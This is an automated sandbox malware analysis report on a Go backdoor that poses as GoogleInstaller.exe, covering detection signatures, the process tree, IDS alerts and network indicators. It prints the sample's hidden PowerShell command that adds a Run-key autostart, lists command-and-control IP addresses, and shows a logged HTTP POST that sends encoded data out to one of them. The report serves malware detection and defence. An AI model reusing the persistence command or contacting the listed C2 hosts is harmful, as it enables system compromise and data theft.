Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GoogleInstaller.exe

Overview

General Information

Sample name:GoogleInstaller.exe
Analysis ID:1524043
MD5:3d429d9f74da7b1f95ea8db8a486ed20
SHA1:6e7d73e9fb4b67f0587cd7d6dbbabe72be42fa2e
SHA256:e1224cbff7ca30da4bbfeab556bf76f73576d76ae3cf42f49e778ca16ced6f15
Tags:afscvfa-comexeuser-JAMESWT_MHT
Infos:

Detection

GO Backdoor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Allocates memory in foreign processes
Creates an autostart registry key pointing to binary in C:\Windows
Found Tor onion address
Injects a PE file into a foreign processes
Suspicious powershell command line found
Writes to foreign memory regions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GoogleInstaller.exe (PID: 4188 cmdline: "C:\Users\user\Desktop\GoogleInstaller.exe" MD5: 3D429D9F74DA7B1F95EA8DB8A486ED20)
    • BitLockerToGo.exe (PID: 6512 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 1216 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • BitLockerToGo.exe (PID: 2760 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
Process Memory Space: BitLockerToGo.exe PID: 6512JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 6512, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", ProcessId: 1216, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-02T15:14:10.993489+020028555361A Network Trojan was detected192.168.2.65499494.103.90.922993TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-02T15:14:40.440237+020028555371A Network Trojan was detected192.168.2.65499494.103.90.922993TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-02T15:14:40.662521+020028555381A Network Trojan was detected94.103.90.922993192.168.2.654994TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-02T15:14:10.993284+020028555391A Network Trojan was detected94.103.90.922993192.168.2.654994TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: GoogleInstaller.exeReversingLabs: Detection: 13%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability
    Source: GoogleInstaller.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: GoogleInstaller.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.90.9:22993 -> 192.168.2.6:54994
    Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.6:54994 -> 94.103.90.9:22993
    Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.6:54994 -> 94.103.90.9:22993
    Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 94.103.90.9:22993 -> 192.168.2.6:54994
    Found Tor onion address
    Source: GoogleInstaller.exe, 00000000.00000002.2377337169.0000000004B72000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: GoogleInstaller.exe, 00000000.00000002.2377337169.0000000003EFD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: GoogleInstaller.exe, 00000000.00000002.2377337169.00000000046F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: BitLockerToGo.exe, 00000002.00000002.4016112520.0000000002F6B000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
    Source: global trafficTCP traffic: 192.168.2.6:54994 -> 94.103.90.9:22993
    Source: Joe Sandbox ViewIP Address: 94.103.90.9 94.103.90.9
    Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
    Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 162X-Api-Key: tbNgF6UlAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 33 0b 17 54 0c 11 2d 2c 2f 54 3b 08 02 1a 1a 31 5c 00 31 5f 58 3f 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 1b 2a 03 11 51 03 17 2e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 16 1d 54 0a 17 58 28 3f 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 04 59 01 48 50 25 01 5c 24 0a 59 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a Data Ascii: M*L\K3T-,/T;1\1_X?!EOM:DSE*Q.LJK9AULTX(?EOM9L\KWYHP%\$YEOM\EYMP]SSV^X[RYQZYR^K
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91User-Agent:
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91http://46.8.232.106
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000002.2487699090.0000000007A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: GoogleInstaller.exeString found in binary or memory: https://github.com/golang/protobuf/issues/1609):
